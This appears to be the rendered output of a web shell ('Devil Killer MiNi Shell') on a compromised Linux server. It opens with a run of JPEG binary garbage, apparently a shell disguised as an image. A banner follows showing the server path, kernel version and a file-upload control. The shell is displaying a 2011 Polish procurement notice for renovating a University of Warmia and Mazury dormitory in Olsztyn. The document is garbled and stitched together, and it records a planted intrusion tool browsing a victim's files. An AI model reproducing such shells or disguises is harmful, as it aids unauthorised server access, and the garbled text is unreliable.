JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110321/90917-N-2011.html

<p class="kh_header"><b>Olsztyn: Przebudowa i remont z dostosowaniem do przepisów przeciwpożarowych Domu Studenta nr 9 przy ul. Kanafojskiego 8 Uniwersytetu Warmińsko- Mazurskiego w Olsztynie</b><br>
<b>Numer ogłoszenia: 90917 - 2011; data zamieszczenia: 21.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-957 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i remont z dostosowaniem do przepisów przeciwpożarowych Domu Studenta nr 9 przy ul. Kanafojskiego 8 Uniwersytetu Warmińsko- Mazurskiego w Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych przy przebudowie i remoncie Domu Studenta nr 9 Uniwersytetu Warmińsko-Mazurskiego w Olsztynie przy ul. Kanafojskiego 8, według projektu opracowanego przez:
architektura- mgr inż. arch. Maciej Deja upr. 74/81/OL członek W-M OIA WM-0060 
konstrukcja- mgr inż. Zbigniew Dąbrowski upr. 62/86/OL członek W-M WAM/BO/0446/01 
instalacje sanitarne- inż. Stanisław Ciborowski upr. 122/75/OL członek W-M OIIB WAM/IS/0347/01
instalacje elektryczne- inż. Jarosław Kukliński upr. 107/01/OL członek W-M OIIB WAM/IE/1349/01
oraz pozwoleniem na budowę nr II-779/2010 z dnia 02.11.2010 r., wydanym przez Prezydenta Miasta Olsztyn
Zakres przedmiotu zamówienia obejmuje niżej wymienione prace:
roboty budowlane remontowe  w zakresie:
wyburzenia
wyrównywania ścian i posadzek
pokryć dachowych
ułożenia terakoty
ułożenia glazury
izolacje, izolacje akustyczne
stolarka budowlana
tynkowanie
malowanie 
montaż wyrobów metalowych ( balustrady, daszki systemowe)
ułożenie wycieraczek systemowych
prace wykończeniowe
drogi piesze ( materiał z odzysku)
roboty budowlane inwestycyjne w zakresie:
przygotowanie terenu pod budowę 
roboty ziemne
betonowanie
zbrojenie
roboty murarskie
roboty konstrukcyjne
nakładanie powłok antykorozyjnych
roboty izolacyjne (docieplenie elewacji)
ścianki działowe z płyt g-k
sufity podwieszane
wyposażenie techniczne
        roboty w zakresie kształtowania terenu
roboty elektryczne remontowe w zakresie:
prace demontażowe
budowa linii kablowych
przebudowa kabla oświetleniowego
montaż tablic i WLZ-ów
instalacje elektryczne
instalacje teletechniczne sieci komputerowej
system telewizji przemysłowej
instalacja domofonowa
instalacja telefoniczna
instalacja TV
instalacja wyrównawcza główna i miejscowa
instalacja odgromowa
badania i pomiary elektryczne
roboty elektryczne inwestycyjne- sygnalizacji pożaru
system sygnalizacji alarmu pożaru i DSO
system oddymiania
roboty instalacyjne  sanitarne remontowe
roboty demontażowe
instalacje c.o.
roboty instalacyjne sanitarne inwestycyjne
instalacja wodociągowa i p.poż. 
instalacja kanalizacyjna
wentylacja mechaniczna klubu i klimatyzacja serwerowi
instalacja p. poż. zewnętrzna
węzeł cieplny- roboty instalacyjne
Specyfikacja Istotnych Warunków Zamówienia wraz z dokumentacją projektową oraz przedmiarami robót w formie elektronicznej udostępniona jest na stronie internetowej Działu Zamówień Publicznych Uniwersytetu Warmińsko- Mazurskiego. 
Wszystkie materiały zastosowane do realizacji zamówienia, muszą posiadać świadectwa dopuszczenia Instytutu Techniki Budowlanej, a materiały zastosowane wewnątrz, muszą posiadać ponadto świadectwo dopuszczenia Państwowego Zakładu Higieny.
Wszystkie wymienione w przedmiarach nazwy materiałów i urządzeń należy rozumieć jako określenie wymaganych parametrów technicznych i standardów jakościowych.
Zamawiający dopuszcza składanie ofert z zastosowaniem materiałów równoważnych, o ile dokumentacja projektowa lub SST przewidują taką możliwość. Równoważność zastosowanych materiałów i urządzeń udowodni Wykonawca,  podając parametry techniczne materiałów lub urządzeń przewidywanych do wbudowania wg projektu.
Jeżeli Wykonawca uzna, że są elementy robót, wynikające z  dokumentacji projektowej, przeprowadzonej wizji lokalnej niezbędne do zrealizowania całości  zamówienia, powinien je uwzględnić w ofercie.
Wykonawca wyłoniony w przetargu, w terminie 14 dni po podpisaniu umowy, zobowiązany jest do przedstawienia kosztorysów szczegółowych wraz ze wskaźnikami cenotwórczymi z wyodrębnieniem, dla robót zewnętrznych, następujących rozdziałów lub pozycji z przedmiarów, zachowując kolejność pozycji, obejmujące naliczanie różnej wartości podatku VAT jak przy pozostałych robotach a mianowicie:
przedmiar robót elektrycznych- dział nr 2 i 3 ( poz. od 12 do 33) 
przedmiar robót sanitarnych- dział 6 ( poz. od 195 do 199)
przedmiar robót budowlanych inwestycyjnych- poz.16 (całość)
przedmiar robót budowlanych remontowych- poz.18 (całość)
Kosztorys szczegółowy musi być wartościowo zgodny z ofertową ceną ryczałtową jak również winien być zatwierdzony przez Zamawiającego.
Wykonawca udzieli co najmniej 3-letniej gwarancji na wszystkie prace budowlano- instalacyjne, w tym na materiały i urządzenia a na materiały i urządzenia zgodnie z kartą gwarancyjną producenta. W związku z dużym ruchem generowanym przez użytkowników sieci we wszystkich domach studenckich, należy zastosować wydajne zarządzane przełączniki, które wprowadzą dodatkowe mechanizmy bezpieczeństwa sieci, w tym pozwolą na kontrole wykorzystywania pasma oraz zabezpieczą przed zbędnymi połączeniami.
Wykonawca uwzględni w ryczałtowej cenie ofertowej oraz w kosztorysie szczegółowym następujące zmiany do projektu w branży elektrycznej dotyczącej wyposażenia szaf dystrybucyjnych SK- 1 i SK- 2 dla instalacji komputerowo-logicznej. 
Wyposażenie 1 szafy musi składać  się z urządzeń o następujących parametrach:
jeden  przełącznik zarządzany o następujących  parametrach:
Liczba portów 1000BaseT (RJ45) 24 szt
Liczba gniazd MiniGBIC (SFP) 4 szt
Porty komunikacji RS232 (RJ45)
Zarządzanie, monitorowanie i konfiguracja  SNMPv1 - Simple Network Management Protocol ver. 1
SNMPv2 - Simple Network Management Protocol ver. 2
SNMPv3 - Simple Network Management Protocol ver. 3
CLI - Command Line Interface
RMON - Remote Monitoring
RMON II - Remote Monitoring ver. 2
zarządzanie przez przeglądarkę WWW
TFTP - Trivial File Transfer Protocol
Protokoły uwierzytelniania i kontroli dostępu IEEE 802.1x - Network Login (MAC-based Access Control)
TACACS+ - Terminal Access Controller Access Control System
RADIUS
SSH - Secure Shall
ACL bazujący na sieciach VLAN
IEEE 802.1x - Network Login (Port-based Access Control)
Obsługiwane protokoły routingu    ruting statyczny
RIP v1 - Routing Information Protocol ver. 1
RIP v2 - Routing Information Protocol ver. 2
Obsługiwane protokoły i standardy   IEEE 802.3 - 10BaseT
IEEE 802.3u - 100BaseTX
IEEE 802.3ab - 1000BaseT
IEEE 802.3z - 1000BaseSX/LX
IEEE 802.1s - Multiple Spanning Tree
IEEE 802.1w - Rapid Convergence Spanning Tree
IEEE 802.1x - Network Login
IEEE 802.3ad - Link Aggregation Control Protocol
IEEE 802.3x - Flow Control
IEEE 802.1D - Spanning Tree
IEEE 802.1p - Priority
IEEE 802.1Q - Virtual LANs
CDP - Cisco Discovery Protocol
IGMP - Internet Group Management Protocol
NTP - Network Time Protocol
Jumbo frame support
Rozmiar tablicy adresów MAC 12000
Algorytm przełączania store-and-forward
Prędkość magistrali wew. 32
Przepustowość 38,7 mpps
Bufor pamięci 128 MB
32 MB
Warstwa przełączania 2
3
Możliwość łączenia w stos Tak
Typ obudowy rack 19
Maksymalny pobór mocy100 Wat
Wyposażenie standardowe IP Base (Standard Image) - podstawowe funkcje rutowania statycznego i RIP 
kabel zasilający
Dołączone oprogramowanie Cisco Network Assistant
Szerokość 19 cali
445 mm
Wysokość 1 U
44 mm
Głębokość 378 mm
Masa netto 5,5 kg
sześć przełączników o następujących parametrach:
urządzenie o stałej konfiguracji
min.  64MB pamięci DRAM oraz 32MB pamięci Flash
obsługa min. 8000 adresów MAC
wydajność przełączania co najmniej 16 Gbps oraz przepustowość co najmniej 6,5 Mpps dla pakietów 64 bajtowych;
co najmniej 24 porty FastEthernet w standardzie 10/100BaseT oraz dwa porty combo (SFP lub 10/100/1000BASE-T)
automatyczne wykrywanie przeplotu (AutoMDIX) na portach miedzianych
obsługa co najmniej 64 sieci VLAN i 4000 VLAN ID
obsługa mechanizmów dystrybucji informacji o sieciach VLAN pomiędzy przełącznikami
obsługa protokołów sieciowych zgodnie ze standardami:
IEEE 802.1x 
IEEE 802.1s 
IEEE 802.1w
IEEE 802.3x full duplex dla 10BASE-T i 100BASE-TX 
IEEE 802.3ad
IEEE 802.1D 
IEEE 802.1p 
IEEE 802.1Q 
IEEE 802.3 10BASE-T 
IEEE 802.3u 100BASE-TX 
IEEE 802.3z 1000BASE-X 
IEEE 802.3ab 100BASE-T
mechanizmy związane z zapewnieniem jakości usług w sieci:
obsługa co najmniej czterech kolejek sprzętowych, wyjściowych dla różnego rodzaju ruchu
mechanizm automatycznej konfiguracji portów do obsługi VoIP
mechanizmy związane z zapewnieniem bezpieczeństwa sieci:
dostęp do urządzenia przez konsolę szeregową, SSHv2 i SNMPv3
możliwość autoryzacji prób logowania do urządzenia za pomocą serwerów RADIUS lub TACACS+
możliwość tworzenia portów monitorujących, pozwalających na kopiowanie na port monitorujący ruchu z innego dowolnie wskazanego portu lub sieci VLAN z lokalnego przełącznika
ochrona przed rekonfiguracją struktury topologii Spanning Tree spowodowana przez niepowołane i nieautoryzowane urządzenie sieciowe
obsługa list kontroli dostępu (ACL) z uwzględnieniem adresów MAC i IP, portów TCP/UDP bez spadku wydajności urządzenia
min. 5 poziomów uprawnień do zarządzania urządzeniem (z możliwością konfiguracji zakresu dostępnych funkcjonalności i komend)
współpraca z systemami kontroli dostępu do sieci typu NAC, NAP itp.
obsługa ruchu multicast z wykorzystaniem IGMPv3
obsługa grupowania portów w jeden kanał logiczny zgodnie z LACP
plik konfiguracyjny urządzenia możliwy do edycji w trybie off-line, tzn. konieczna jest możliwość przeglądania i zmian konfiguracji w pliku tekstowym na dowolnym urządzeniu PC. Po zapisaniu konfiguracji w pamięci nie ulotnej powinno być możliwe uruchomienie urządzenia z nowa konfiguracją. Zmiany aktywnej konfiguracji muszą być widoczne natychmiastowo- nie dopuszcza się częściowych restartów urządzenia po dokonaniu zmian
możliwość zarządzania przy pomocy bezpłatnej aplikacji graficznej dostarczanej przez producenta
możliwość zastosowania zewnętrznego redundantnego zasilacza
możliwość montażu w szafie 19
obudowa wykonana z metalu
Wykonawca w trakcie realizacji zadania zobowiązany jest pokryć koszty dostawy wszystkich mediów: energii elektrycznej , ciepłej wody użytkowej i wod- kan, ogrzewania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.12-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 200 000,00 PLN ( słownie: dwieście tysięcy złotych zero groszy ).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wyżej wskazanego wskazanego warunku Wykonawca wykaże posiadanie wiedzy i doświadczenia związanego z realizacją minimum dwóch robót budowlanych, w zakresie niezbędnym do wykazania spełniania warunku, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonanych zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych, tj. polegających na realizacji minimum dwóch robót budowlanych polegających na wybudowaniu lub modernizacji obiektów użyteczności publicznej, o kubaturze nie mniejszej niż 7 000 m3 i wartości nie mniejszej niż 4 500 000,00 zł (brutto), każda. Ocena warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wskazanego wyżej warunku  Wykonawca wykaże, że dysponuje lub będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnymi za kierowanie robotami budowlanymi oraz posiadającymi wymagane kwalifikacje zawodowe i wykształcenie, niezbędne do wykonywania zamówienia, tj.
a.	w specjalności konstrukcyjno - budowlanej bez ograniczeń: Kierownik budowy, wymagane kwalifikacje: wyższe wykształcenie techniczne budowlane, uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów - zgodnie z polskim prawem budowlanym.
b.	w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, wymagane kwalifikacje: wyższe wykształcenie techniczne w branży sanitarnej, uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów - zgodnie z polskim Prawem budowlanym. 
c.	w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych bez ograniczeń, wymagane kwalifikacje: wyższe wykształcenie techniczne w branży elektrycznej, uprawnienia do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów - zgodnie z polskim Prawem budowlanym.
d.	 w specjalności telekomunikacyjnej, wymagane kwalifikacje: wykształcenie techniczne w branży telekomunikacyjnej. 
Ocena warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wskazanego wyżej warunku  Wykonawca wykaże posiadanie środków własnych lub zdolności kredytowej na kwotę nie mniejszą niż 4 500 000,00 zł oraz opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 4 500 000,00 PLN. 
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem pieczęcią wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego oraz jej podpisem, kopię dowodu wpłaty wadium, harmonogram rzeczowy obejmujący realizację całego zadania z wyszczególnieniem elementów robót oraz terminu ich wykonania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres  gwarancji - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zmiana dotyczy terminu realizacji umowy. Termin realizacji umowy ulegnie przesunięciu w wypadku wystąpienia opóźnień wynikających z:
a)	przestojów i opóźnień zawinionych przez Zamawiającego,
b)	działania siły wyższej (np. klęski żywiołowej, strajku) mającej bezpośredni wpływ na terminowość wykonywanych robót,
c)	wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru,
d)	wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
